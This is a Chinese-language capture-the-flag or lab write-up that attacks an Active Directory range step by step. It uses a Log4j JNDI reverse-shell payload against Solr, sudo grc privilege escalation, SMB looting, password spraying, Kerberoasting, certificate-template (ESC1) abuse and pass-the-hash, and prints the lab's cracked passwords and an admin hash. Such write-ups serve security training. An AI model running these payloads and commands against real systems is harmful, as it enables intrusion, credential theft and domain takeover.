考点:
- log4j2 jndi
- grc提权
- SMB
- 密码喷洒
- spn
- ESC1
给的ip访问了没服务,fscan启动
fscan64.exe -h 39.99.154.173
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.99.154.173 is alive
[*] Icmp alive hosts len is: 1
39.99.154.173:22 open
39.99.154.173:80 open
39.99.154.173:8983 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.99.154.173 code:200 len:612 title:Welcome to nginx!
已完成 3/3
[*] 扫描结束,耗时: 1m24.5247609s看到有个8983,访问上去是一个solar服务,并且依赖里用了log4j
试了下log4j,发现能外带请求,所以确实有洞
http://39.99.154.173:8983/solr/admin/collections?action=${jndi:ldap://941chl.dnslog.cn}
用JNDIExploit直接开梭
在自己vps上起一个ldap服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPS_IP然后弹shell的payload为
GET /solr/admin/collections?action=${jndi:ldap://VPS_IP:1389/Basic/ReverseShell/VPS_IP/9383} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
上去之后没找到flag,而且权限很低,创建文件啥的都不行,说明要提权。suid没找到,不过sudo -l找到了grc命令
https://gtfobins.github.io/gtfobins/grc/
sudo grc然后后面跟想要执行的命令即可
sudo grc cat /root/flag01.txt
接着wget一下需要的软件然后扫内网建代理
solr@ubuntu:/home$ sudo grc ./fscan -h 172.22.9.19/24
sudo grc ./fscan -h 172.22.9.19/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
(icmp) Target 172.22.9.47 is alive
[*] Icmp alive hosts len is: 4
172.22.9.7:135 open
172.22.9.26:135 open
172.22.9.7:139 open
172.22.9.26:139 open
172.22.9.47:80 open
172.22.9.7:80 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.47:22 open
172.22.9.7:445 open
172.22.9.47:139 open
172.22.9.47:445 open
172.22.9.26:445 open
172.22.9.7:88 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetInfo:
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] WebTitle: http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
[*] NetBios: 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] NetBios: 172.22.9.47 fileserver Windows 6.1
[*] 172.22.9.47 (Windows 6.1)
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect172.22.9.7 XIAORANG-DC
172.22.9.19 已拿下
172.22.9.26 DESKTOP-CBKTVMO
172.22.9.47 fileserver 因为这个题题目考点那儿写了个SMB,估计是有SMB服务,那肯定是fileserver这台ubuntu上存在(fscan扫不出来但是nmap是扫的出来的),用smbclient连了一下果然连上去了
proxychains python3 smbclient.py 172.22.9.47
然后在secret目录获得flag
接着回根目录用get personnel.db下一下这个数据库,看了一下有个user表里有密码但没用户名
又有一个表有一堆用户名
显然是想我们用密码喷洒一下,最有可能成功的就是172.22.9.26这台windows主机了
proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt|| grep account最后有效的为
zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTY但俩都rdp不上去,回想提示说了个spn,试试查找下域用户下的spn
proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
得到了chenchen和zhangxia的密码哈希,hashcat爆一下
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force
zhangxia:MyPass2@@6
chenchen:@Passw0rd@这俩账户终于能rdp上去了,但是flag在管理员目录下,还是拿不到。回看题目考点里说了个AD CS,估计是要拿那台CA通过什么证书利用拿域控,先枚举一下有哪些证书
proxychains certipy find -u 'liupeng@xiaorang.lab' -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : 16777216
65536
ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Property Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
[!] Vulnerabilities
ESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication直接就扫出来有ESC1了,一眼丁真了属于是,照着别人的文章直接开打:ADCS攻击之证书模板配置错误 ESC1。和他那个演示不一样的就是我们这里用的Certificate Templates是XR Manager以及ca是xiaorang-XIAORANG-DC-CA,其他都差不多,直接开打。
这里注意改一下host,没改host连接会超时,我反正把域里这两台都加上去了(最后两条)
首先利用XR Manager模板为域管请求证书
proxychains certipy req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
接着转换格式,请求TGT,DCSync或者PTT
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
拿到域管哈希,pth一下即可
proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk
